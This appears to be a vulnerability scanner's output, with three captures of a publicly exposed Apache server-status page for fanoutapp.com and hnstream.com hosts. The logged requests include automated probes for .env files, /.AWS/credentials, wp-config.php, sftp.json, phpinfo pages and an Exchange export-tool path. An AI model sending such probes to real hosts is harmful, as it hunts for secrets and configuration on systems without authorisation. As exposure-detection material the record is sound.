0.3103129220.00.023.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-519534026/17/1215W 0.2900137190.00.033.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-51953400/15/1188_ 0.2954107060.00.033.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-51953400/17/1217_ 0.2943100230.00.033.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-51953400/16/1189_ 0.2943124430.00.033.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-51953400/17/1194_ 0.2944108190.00.033.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-51953400/17/1196_ 0.2943103440.00.033.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-51953400/16/1219_ 0.2943140400.00.033.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-51953400/16/1187_ 0.293391220.00.033.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-51953400/17/1169_ 0.2933102820.00.043.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-51953400/16/1204_ 0.2933107770.00.043.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-51953400/18/1191_ 0.2933100980.00.033.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-51953400/17/1225_ 0.3023122500.00.033.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-51953400/17/1189_ 0.302397950.00.033.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-48-0/0/1101. 0.00278374263181180.00.003.53 157.52.109.23http/1.1api.hnstream.com:8000GET /config/cache.php HTTP/1.1 1-48-0/0/1097. 0.0027837494109420.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /php_info.php HTTP/1.1 1-48-0/0/1068. 0.00278374148104820.00.003.38 157.52.109.23http/1.1api.hnstream.com:8000GET /public/client/planinfo HTTP/1.1 1-48-0/0/1075. 0.00278374131108540.00.003.08 157.52.109.23http/1.1api.hnstream.com:8000GET /infos.php HTTP/1.1 1-48-0/0/1093. 0.0027837474106260.00.003.41 157.52.109.23http/1.1api.hnstream.com:8000GET /time.php HTTP/1.1 1-48-0/0/1100. 0.0027837478121300.00.003.21 157.52.109.23http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 1-48-0/0/1069. 0.00278374315138890.00.003.71 157.52.109.23http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 1-48-0/0/1096. 0.00278374333118830.00.003.24 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/email.php HTTP/1.1 1-48-0/0/1082. 0.00278374260124080.00.003.45 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-48-0/0/1087. 0.00278374132144460.00.002.92 157.52.109.23http/1.1api.hnstream.com:8000GET /temp.php HTTP/1.1 1-48-0/0/1103. 0.0027837483105610.00.003.13 157.52.109.23http/1.1api.hnstream.com:8000GET /config/paths.php HTTP/1.1 1-48-0/0/1068. 0.00278374185111900.00.002.97 157.52.109.23http/1.1api.hnstream.com:8000GET /config/production.config.php HTTP/1.1 1-48-0/0/1091. 0.00278374168133470.00.003.32 157.52.109.23http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 1-48-0/0/1090. 0.00278374224138840.00.003.93 157.52.109.23http/1.1api.hnstream.com:8000GET /app/etc/config.php HTTP/1.1 1-48-0/0/1051. 0.00278374176108220.00.003.02 157.52.109.23http/1.1api.hnstream.com:8000GET /config/app_local.php HTTP/1.1 1-48-0/0/1096. 0.00278374325113130.00.003.39 157.52.109.23http/1.1api.hnstream.com:8000GET /config/routes.php HTTP/1.1 1-48-0/0/1074. 0.0027837428097360.00.003.65 157.52.109.23http/1.1api.hnstream.com:8000GET /.vscode/sftp.json HTTP/1.1 1-48-0/0/1094. 0.00278374272116140.00.003.31 157.52.109.23http/1.1api.hnstream.com:8000GET /wp-config.php HTTP/1.1 1-48-0/0/1090. 0.00278374257104180.00.003.49 157.52.109.23http/1.1api.hnstream.com:8000GET /symfony/_profiler/phpinfo HTTP/1.1 1-48-0/0/1083. 0.00278374287101900.00.003.68 157.52.109.23http/1.1api.hnstream.com:8000GET /config/view.php HTTP/1.1 1-48-0/0/1070. 0.0027837432495520.00.003.52 157.52.109.23http/1.1api.hnstream.com:8000GET /config/security.config.php HTTP/1.1 1-48-0/0/1072. 0.00278374226112070.00.003.25 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/constants.php HTTP/1.1 1-48-0/0/1070. 0.00278374276114570.00.003.27 157.52.109.23http/1.1api.hnstream.com:8000GET /application/config/foreign_chars.php HTTP/1.1 1-48-0/0/1097. 0.0027837429
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb048947c
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 29-Oct-2025 08:56:04 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 48 Parent Server MPM Generation: 47 Server uptime: 42 days 10 hours 50 minutes 58 seconds Server load: 0.23 0.21 0.18 Total accesses: 70010 - Total Traffic: 214.8 MB - Total Duration: 754793 CPU Usage: u64.03 s101.22 cu1001.92 cs309.95 - .0403% CPU load .0191 requests/sec - 61 B/second - 3217 B/request - 10.7812 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03918366no1yes124010 13918365no0yes025000 Sum201 149010 __W_______________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4739183660/10/1126_ 0.3033144810.00.033.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-4739183660/12/1068_ 0.3023105210.00.032.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-47391836626/10/1088W 0.2900126050.00.033.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4739183660/9/1128_ 0.3023107500.00.023.61 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-4739183660/10/1085_ 0.2975107280.00.023.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-4739183660/7/1092_ 0.2963100500.00.023.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-4739183660/11/1076_ 0.2963108910.00.023.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-4739183660/9/1107_ 0.2963126860.00.023.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-4739183660/10/1102_ 0.295399450.00.053.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-4739183660/10/1093_ 0.295392560.00.022.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-4739183660/12/1101_ 0.3013103060.00.032.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-4739183660/7/1093_ 0.3013107840.00.023.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4739183660/12/1108_ 0.2953129240.00.023.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-4739183660/8/1084_ 0.294398980.00.023.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-4739183660/10/1109_ 0.301385550.00.022.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-4739183660/8/1076_ 0.2943113130.00.023.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-4739183660/9/1084_ 0.294389670.00.022.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-4739183660/10/1092_ 0.301387600.00.032.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4739183660/10/1115_ 0.3033129940.00.033.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-4739183660/12/1085_ 0.300381970.00.032.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4739183660/11/1058_ 0.303393600.00.023.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-4739183660/8/1093_ 0.302396700.00.022.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-4739183660/9/1082_ 0.300390160.00.023.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4739183660/11/1119_ 0.3003110360.00.033.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4739183660/12/1078_ 0.300382950.00.103.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4739183650/10/1074_ 0.3090818172040.00.093.48 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /rooms/default/messages/ HTTP/1.1 1-4739183650/5/1071_ 0.289037106950.00.013.02 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-4739183650/6/1043_ 0.258921102420.00.013.33 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-4739183650/8/1051_ 0.2286530106150.00.023.04 140.248.88.40http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-4739183650/7/1065_ 0.308820104200.00.023.36 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/django_eventstream/reconnecting-eventsource.js HTTP 1-4739183650/5/1074_ 0.258770119940.00.013.16 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-4739183650/8/1046_ 0.288456134310.00.023.66 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-4739183650/10/1064_ 0.308645114200.00.033.18 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?lastEventId=room-default%3A188 HTTP/ 1-4739183650/9/1059_ 0.3086513119400.00.033.40 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /default?user=dev HTTP/1.1 1-4739183650/11/1061_ 0.2885914142550.00.032.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /default?user=dev HTTP/1.1 1-4739183650/10/1076_ 0.308642102440.00.023.07 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-4739183650/8/1046_ 0.288506109050.00.022.90 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?lastEventId=room-default%3A186 HTTP/ 1-4739183650/10/1063_ 0.3185019130870.00.023.27 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /rooms/default/messages/ HTTP/1.1 1-4739183650/10/1065_ 0.3180219135060.00.023.88 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /rooms/default/messages/ HTTP/1.1 1-4739183650/6/1025_ 0.297902105240.00.012.97 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-4739183650/11/1069_ 0.317906108760.00.023.27 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-4739183650/7/1049_ 0.29797693050.00.023.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?lastEventId=room-default%3A186 HTTP/ 1-4739183650/10/1071_ 0.3163940112110.00.023.26 167.82.233.122http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 1-4739183650/9/1064_ 0.317906101050.00.023.37 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-4739183650/11/1061_ 0.29911698420.00.033.63 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-4739183650/6/1042_ 0.28908389610.00.023.38 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-4739183650/7/1049_ 0.297853109230.00.053.14 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-4739183650/8/1046_ 0.296345111230.00.02
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf7ab67929
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Friday, 07-Mar-2025 04:33:55 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 55 days 5 hours 54 minutes 58 seconds Server load: 0.41 0.45 0.46 Total accesses: 58952 - Total Traffic: 177.5 MB - Total Duration: 3744500 CPU Usage: u90.01 s137.98 cu924.39 cs336.84 - .0312% CPU load .0124 requests/sec - 39 B/second - 3157 B/request - 63.5178 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes124000 155831no0yes025000 356175no0yes025000 Sum300 174000 _____W____________________________________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/178/1049_ 6.842371188170.00.552.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/166/1003_ 6.84143667400.00.593.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-45859410/165/981_ 6.8030696132200.00.522.99 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 0-45859410/165/1025_ 6.8403350510.00.432.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-45859410/171/968_ 6.8425146710.00.642.75 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-458594110/172/1008W 6.8200158240.00.663.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-45859410/186/1017_ 6.8317109151240.00.623.04 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/169/1002_ 6.83231329637030.00.532.88 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/175/989_ 6.8330696452570.00.563.22 159.223.73.235http/1.1api.hnstream.com:8000\x16\x03\x01 0-45859410/172/1040_ 6.8017054672850.00.513.18 127.0.0.1http/1.1api.hnstream.com:8000POST /__tests__/test-become/.env HTTP/1.1 0-45859410/159/969_ 6.8023083142160.00.452.86 127.0.0.1http/1.1api.hnstream.com:8000POST /redmine/.env HTTP/1.1 0-45859410/176/1013_ 6.84131154050.00.453.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-45859410/171/990_ 6.8403260130.00.632.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/172/1026_ 6.8413299690.00.522.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-45859410/168/980_ 6.80306841154300.00.612.80 127.0.0.1http/1.1api.hnstream.com:8000POST /.env.prod HTTP/1.1 0-45859410/168/1008_ 6.84031176850.00.573.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-45859410/183/997_ 6.802185170870.00.742.90 127.0.0.1http/1.1api.hnstream.com:8000GET /debug/default/view.html HTTP/1.1 0-45859410/172/1010_ 6.8414639160.00.583.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-45859410/162/1004_ 6.83126423137150.00.563.04 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/170/998_ 6.8029114131770.00.482.63 127.0.0.1http/1.1api.hnstream.com:8000POST /.env.production HTTP/1.1 0-45859410/172/978_ 6.80351423636260.00.672.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-45859410/163/1007_ 6.83291612632660.00.432.66 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/171/992_ 6.812184647030.00.653.09 127.0.0.1http/1.1api.hnstream.com:8000GET /debug/default/view HTTP/1.1 0-45859410/176/1009_ 6.8012591129670.00.612.97 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-45859410/168/995_ 6.842185955920.00.623.17 162.216.150.35http/1.1api.hnstream.com:8000\x16\x03\x01 1-45558310/100/672_ 4.67713173116420.00.332.33 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/102/668_ 4.68472566122640.00.351.95 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/83/634_ 4.6769541096590.00.192.06 198.235.24.30http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/99/669_ 4.5747204100040.00.322.36 167.82.236.34http/1.1api.hnstream.com:8000GET /comments/stream//%22https://www.gov.uk/government/publicat 1-45558310/92/669_ 4.7027283120860.00.262.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /todos/default/items/?after_change=11576 HTTP/1.1 1-45558310/87/651_ 4.6169499498020.00.322.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/95/679_ 4.702728291890.00.342.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000OPTIONS /todos/default/items/?after_change=11576 HTTP/1.1 1-45558310/93/661_ 4.70272731089740.00.262.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /todos/default/items/?after_change=11576 HTTP/1.1 1-45558310/85/664_ 4.7017291598020.00.301.90 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/96/658_ 4.48712612105310.00.342.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/97/667_ 4.7027289601600.00.292.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /todos/default/items/ HTTP/1.1 1-45558310/85/657_ 4.561724591270.00.402.29 167.82.236.28http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.cancer.org/treatment/treatm 1-45558310/102/667_ 4.715041989300.00.241.81 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/93/653_ 4.642722188220.00.582.68 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/98/682_ 4.5669344102210.00.272.14 167.82.236.34http/1.1api.hnstream.com:8000GET /%22https://realm.io//%22 HTTP/1.1 1-45558310/100/660_ 4.7027286590120.00.301.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000HEAD /todos/default/items/ HTTP/1.1 1-45558310/90/665_ 4.662960561094000.00.332.17 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/85/667_ 4.68412210109830.00.322.32 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/76/642_ 4.564994589730.00.211.98 167.82.236.29http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.hercules-390.eu/%22 HTTP/1. 1-45558310/92/638_ 4.63297524589480.00.461.97 198.235.24.241http/1.1 1-45558310/80/649_ 4.682976188270.00.182.14 198.235.24.241http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/87/646_ 4.7017290596290.00.392.30 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-45558310/103/659_ 4.69272843105800.00.372.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /robots.txt HTTP/1.1 1-45558310/97/652_ 4.6929650590710.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfa3600c7a
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 05-Mar-2025 01:41:33 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 53 days 3 hours 2 minutes 36 seconds Server load: 0.31 0.39 0.43 Total accesses: 57342 - Total Traffic: 172.1 MB - Total Duration: 3174931 CPU Usage: u84.61 s131.79 cu924.39 cs336.84 - .0322% CPU load .0125 requests/sec - 39 B/second - 3146 B/request - 55.3683 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes124000 155831no0yes025000 356175no0yes025000 Sum300 174000 ______________W___________________________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/145/1016_ 5.266301182540.00.352.63 127.0.0.1http/1.1 0-45859410/138/975_ 5.31333664910.00.443.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-45859410/132/948_ 5.3303130120.00.452.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-45859410/131/991_ 5.263361345880.00.352.80 127.0.0.1http/1.1 0-45859410/134/931_ 5.313413142280.00.402.51 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/136/972_ 5.3223154590.00.513.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-45859410/146/977_ 5.303413148550.00.532.94 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/139/972_ 5.3011983635600.00.462.81 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/138/952_ 5.3213450000.00.473.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/140/1008_ 5.3034241669400.00.433.09 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/122/932_ 5.2711933137320.00.372.78 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-45859410/142/979_ 5.3168321149530.00.322.92 127.0.0.1http/1.1api.hnstream.com:8000GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1 0-45859410/138/957_ 5.3223255170.00.492.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-45859410/134/988_ 5.31440294950.00.362.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-458594110/136/948W 5.29001150540.00.532.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-45859410/136/976_ 5.3233674300.00.473.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-45859410/145/959_ 5.29684165790.00.422.59 127.0.0.1http/1.1 0-45859410/140/978_ 5.3144135310.00.503.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-45859410/132/974_ 5.313413134340.00.492.97 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/133/961_ 5.2718744129640.00.402.54 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-45859410/138/944_ 5.3214133290.00.592.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-45859410/132/976_ 5.2518793630740.00.362.60 127.0.0.1http/1.1 0-45859410/139/960_ 5.31701643490.00.512.94 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/141/974_ 5.317012126150.00.522.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/137/964_ 5.31691450510.00.543.08 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/82/654_ 3.645484113370.00.302.30 127.0.0.1http/1.1api.hnstream.com:8000GET /doc/.env HTTP/1.1 1-45558310/83/649_ 3.645463119900.00.311.91 127.0.0.1http/1.1api.hnstream.com:8000GET /repo/.env HTTP/1.1 1-45558310/67/618_ 3.64548494540.00.162.03 127.0.0.1http/1.1api.hnstream.com:8000GET /auth/.env HTTP/1.1 1-45558310/83/653_ 3.64546497620.00.272.31 127.0.0.1http/1.1api.hnstream.com:8000GET /.AWS/credentials HTTP/1.1 1-45558310/71/648_ 3.65686118450.00.191.95 127.0.0.1http/1.1api.hnstream.com:8000GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1 1-45558310/70/634_ 3.64547495200.00.282.04 127.0.0.1http/1.1api.hnstream.com:8000GET /bot/.env HTTP/1.1 1-45558310/75/659_ 3.65683390470.00.212.32 127.0.0.1http/1.1api.hnstream.com:8000GET /v2/_catalog HTTP/1.1 1-45558310/74/642_ 3.656831086590.00.211.95 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-45558310/64/643_ 3.64550493510.00.271.86 127.0.0.1http/1.1api.hnstream.com:8000GET /cms/.env.production HTTP/1.1 1-45558310/81/643_ 3.645483103380.00.212.09 127.0.0.1http/1.1api.hnstream.com:8000GET /Laravel/.env HTTP/1.1 1-45558310/78/648_ 3.656826599160.00.262.17 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/authLogin.cgi HTTP/1.1 1-45558310/72/644_ 3.64550590360.00.372.26 127.0.0.1http/1.1api.hnstream.com:8000GET /download/.env HTTP/1.1 1-45558310/80/645_ 3.64550386570.00.201.77 127.0.0.1http/1.1api.hnstream.com:8000GET /shared/.env HTTP/1.1 1-45558310/76/636_ 3.6463486220.00.462.56 127.0.0.1http/1.1api.hnstream.com:8000GET /infos.php HTTP/1.1 1-45558310/81/665_ 3.645475100560.00.232.10 127.0.0.1http/1.1api.hnstream.com:8000GET /.ENV HTTP/1.1 1-45558310/77/637_ 3.656811586790.00.241.74 127.0.0.1http/1.1api.hnstream.com:8000GET /solr/admin/info/system HTTP/1.1 1-45558310/74/649_ 3.65691589290.00.302.13 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/66/648_ 3.635414107560.00.282.27 127.0.0.1http/1.1api.hnstream.com:8000GET /misc/.env HTTP/1.1 1-45558310/65/631_ 3.645495589160.00.181.95 127.0.0.1http/1.1api.hnstream.com:8000GET /Api/.env HTTP/1.1 1-45558310/77/623_ 3.65695588260.00.431.95 127.0.0.1http/1.1api.hnstream.com:8000GET /evox/about HTTP/1.1 1-45558310/64/633_ 3.63501486400.00.152.10 127.0.0.1http/1.1api.hnstream.com:8000GET /twilio.env HTTP/1.1 1-45558310/70/629_ 3.64635594630.00.292.19 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-45558310/79/635_ 3.65694100340.00.302.33 127.0.0.1http/1.1api.hnstream.com:8000GET /HNAP1 HTTP/1.1 1-45558310/74/629_ 3.6570888010.00.222.10 127.0.0.1http/1.1api.hnstream.com:8000POST /sdk HTTP/1.1 1-45558310/70/651_ 3.655064282190.00.271.93 157.52.66.97http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 2-45-0/0/663. 0.00392045528114137
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf42398574
